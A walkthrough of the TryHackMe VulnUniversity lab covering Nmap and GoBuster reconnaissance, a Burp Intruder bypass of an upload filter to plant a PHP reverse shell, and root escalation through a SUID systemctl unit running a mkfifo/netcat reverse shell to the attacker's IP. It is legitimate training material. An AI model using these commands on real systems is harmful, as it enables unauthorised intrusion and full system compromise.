TryHackeMe VulnUniversity

Today we are going to be going through the box VulnUniversity.  We will be learning how to perform some reconnaissance, use GoBuster, compromise a web server, and privilege escalate.

Let’s start off by using our favorite port scanning tool Nmap.  Using some specific flags we can determine open ports, services running on those ports, and the operating system running on the target. 

The lab provides us with a nice reference for different flags for Nmap.  One they don’t tell you about is –reason, this flag will tell you why it thinks a port is open or closed.  For example, if you get a RST (reset) packet when trying to connect to the port, that usually means the port is closed.

First they want us to answer how many ports are open, for this one we can use the following command

nmap -p- -Pn  -T4 –reason IPAddress

-T4 sets the speed of the scan with 5 being the max, I recommend using 4 or lower to avoid false positives.  I have even had to use delay features in Nmap to really determine if a port was open, because Nmap wasn’t waiting long enough for the port to send back a proper response.

I had to use the -Pn because the scan was assuming the host was down, so we will ignore host discovery.  Sometimes you need to do this in order to get your port scan results.

Now that the scan has run we can see there are 6 ports open.  We can answer the first question now.

If we use the -p-400 flag it will scan ports 1 – 400, which means we will scan 400 ports, the answer to our next question.

Sometimes if you don’t care about the hostname of the device, or you know that the device isn’t performing anything with DNS such as IoT devices, you can use the -n flag to not resolve DNS.

Let’s check the service for squid-http on port 3128 to answer the second question.

nmap -p3128 -sV –reason -T4 IPAddress

We can see that dec-notes is running on port 3333, when searching for what dec-notes was it is a bulletin board system, so that’s our web server.  When we visit that website we see it’s a web server.

I wasn’t able to detect the operating system using nmap -O but we can find it another way.  Right click on the page and select inspect element.  Now click on the Network tab and refresh the page.  Click on the top file that shows /.  If we look are the Response Headers on the right under Server: we can see Apache/2.4.18 (Ubuntu).  Many times people simply forget to hide this kind of information, which is extremely useful to an attacker!

Now we will move on to a tool called GoBuster.  This tool will append words to the end of links and check the HTTP response to determine if they are real directories on the webserver.  We will give it a target of http://IPAddress:3333 and then it will append words to the end attempting to find valid web pages we can visit.

All we need to provide is a wordlist to use and the target URL with the port.  If you didn’t specify the port you would get 0 results, because the webserver isn’t running on port 80 or 443, which would be the default depending if you put in http or https.  We also need to specify which mode we want to run using the dir option.

gobuster dir -u http://IPAddress:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Internal looks like it could be interesting, let’s check it out.

http://IPAddress:3333/internal

Great, looks like we can upload files, maybe we can upload a reverse shell.  This answers our question about what directory has an upload form page.  Since we know this is running Apache, maybe it will handle php files.  Let’s grab a php reverse shell from pentestmonkey and configure it.

https://github.com/pentestmonkey/php-reverse-shell/blopb/master/php-reverse-shell.php

You can download and save it normally or you can use the command line to download the file.
 

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

I recommend at least looking at the website first before downloading the file.  You never know when someone states you need to download and run a file, it could be malicious.

Now we need to edit the file to have our IP address and the port we want to catch the shell on.

nano php-reverse-shell.php

Scroll past the comments in blue where the start of the line is //.  This is how you make a comment in php.  You can see to comments labeled CHANGE THIS for $ip and $port.  Here is where we apply our settings for the listener.  The IP Address will most likely be your Tun0 address, whichever one appears once you connect to the TryHackMe VPN.  The port is whatever you want, just remember it for a command we will run shortly.

Now before we upload this, we need to set up a listener so that our machine catches the shell.  A listener just opens up a port on the attacker’s machine, allowing a connection to be established.  For this I will be using a tool called netcat.  To open a listener on port 1337 run the following

nc -nlvp 1337

n – No DNS.  Since we are using IP addresses, we don’t need DNS.

l – listen for inbound connections

v – verbose, to display some additional information.  We can add multiple Vs if there was an issue with our connection.  This would give us more information to debug the issue.

p – local port number to listen on.  This must match what we put in the reverse shell file.

Now that we are ready to catch the shell let’s upload our file! 

It looks like this extension isn’t allowed.  Maybe there is a different extension we can try.  While we could manually keep naming the file with different extensions, there’s a much easier way to do this.

Open up Burp Suite, assuming you have an updated version you can follow along.  If it is an older version either update your burp, or you will need to configure something like FoxyProxy to send your web browsers traffic to burp.

Once Burp is open click on the Proxy Tab, then the Intercept tab (assuming it isn’t auto selected which is should be), finally the Open Browser button.

Now visit the webpage for the file upload at http://IPAddress:3333/internal

You will need to click Forward in burp to allow the request to go through.  Now on the website click Choose File and select your reverse shell.  Assuming Intercept is still on click on submit and go into Burp.

We can see that our file is being uploaded.  Note that the entire contents of Burp did not find in one screenshot.  Right click in the request area and click send to intruder.  Or you can just click in the request and click Ctrl i.

Intruder can be used to send what we call payloads to a website.  This isn’t the standard payload you may think of.  We will give Intruder a wordlist and the part we select is what will be replaced with our wordlist.  We know that we can’t upload php as an extension, but maybe it will take something else.

Click on the Clear button on the right to clear away anything Burp may already highlighted.

Where it says filename=”php-reverse-shell.php” highlight the extension php after the period and click Add.

You will notice that some symbols will appear around php.

Notice the period is not part of the payload!

Now click on the Payloads tab at the top.  Here we will add some extensions to try to see if the web server was misconfigured.  Maybe they specifically block php but not a different, but similar extensions.

My list will include

php
php2
php3
php4
php5
phtml

phtml is an older standard file extension that was used for PHP2.  As they upgraded php they have used other extensions like php3, but now most programs just use php.  It’s possible that the server will still accept some of the older extensions though.

Type the list of extensions in the Payload Options list and click start attack.

When you click on Response under the Intruder attack windows, click on response and view the responses.  All of them say Extension not allowed, except phtml which says Success.  This means we can upload a php shell with the extension phtml.  We have already uploaded the file by running the intruder attack.  This answers our next question.

I took a guess that the file would get uploaded to /internal/uploads.  If you wanted to not take the guess, you can run the GoBuster command to follow redirects using the -r option.

gobuster dir -u http://IPADDRESS:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Now that the file has been uploaded, and we know where it is, visit the link and get your shell!

You may need to visit the file a few times before it triggers.  I had to go there 3 times before I got my shell.  If you ever accidently close your shell, just reopen a netcat listener and revisit the website.

We need to know who manages this server, if you cd into /home you can see a user Bill.  Then cd into the Bill directory and cat out user.txt.  This answers the next 2 questions.

cd /home

ls

cd bill

cat user.txt

Now we need to escalate our privileges.  Normally I would start off with sudo -l to see what I can run as sudo, but we aren’t in a full shell.  While we could use the socat binary to upgrade our shell, an easier method is python.  We can check if we have python by running which python.

It turns out we do so let’s upgrade our shell

python -c ‘import pty; pty.spawn(“/bin/sh”)’

Now we can run sudo -l, but the issue is we don’t have a password for www-data, which is our current user.

Next let’s check for SUID binaries.

SUID binaries are those with the setuid bit set on them.  When this it set the binary will run as root, but users can still run the binaries.  You might say well why would we do this.  First, some binaries require these sudo permissions to function properly.  Take the ping command as an example.  To open a socket for ping to use it needs to run as root.  Now you have probably never run sudo ping, but when you are running ping it has the setuid bit set, so it is running as root.  Second in normal environments some users may need to run certain binaries as higher privilege, but don’t need access to run commands as root.

To find the SUID binaries I ran the following command on my kali box and the VulnUniversity box to see where the differences were.

find / -perm -4000 2>/dev/null

This uses the find command to look for the permissions where SETUID is set and hides all the errors.

We can visit this site which is very helpful in escalating privileges if you can run certain binaries as sudo, which is what the SUID bit being set does!

https://gtfobins.github.io

After searching a few I found systemctl.  If the SUID bit is set, it does not drop privileges of root, which you can use to make a copy of a binary that will have the SUID bit set.  This means we can get a shell as root!  I am going to use netcat to get a reverse shell.  I tried to spawn a new shell, but was having issues.

Start a netcat listener first

nc -nlvp 7777

Now create the service.  One of the issues I ran into is that our version of netcat doesn’t have the -e flag allowing us to execute commands.  We can use the rm mkfifo command to get a real shell.

WIN=$(mktemp).service

echo ‘[Service]

ExecStart=/bin/sh -c “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.6.43.108 7777 >/tmp/f”

[Install]

WantedBy=multi-user.target’ > $WIN

/bin/systemctl link $WIN

/bin/systemctl enable –now $WIN

The command rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.6.43.108 7777 >/tmp/f is running /bin/sh and redirecting the output to netcat, which is a connection over the network.  These just loop, allowing us to gain a full shell.

Finally cat out root.txt and you have finished the room!

Thanks for joining me as we learned how to gain a shell by attacking a web application.  Until next time keep on hacking!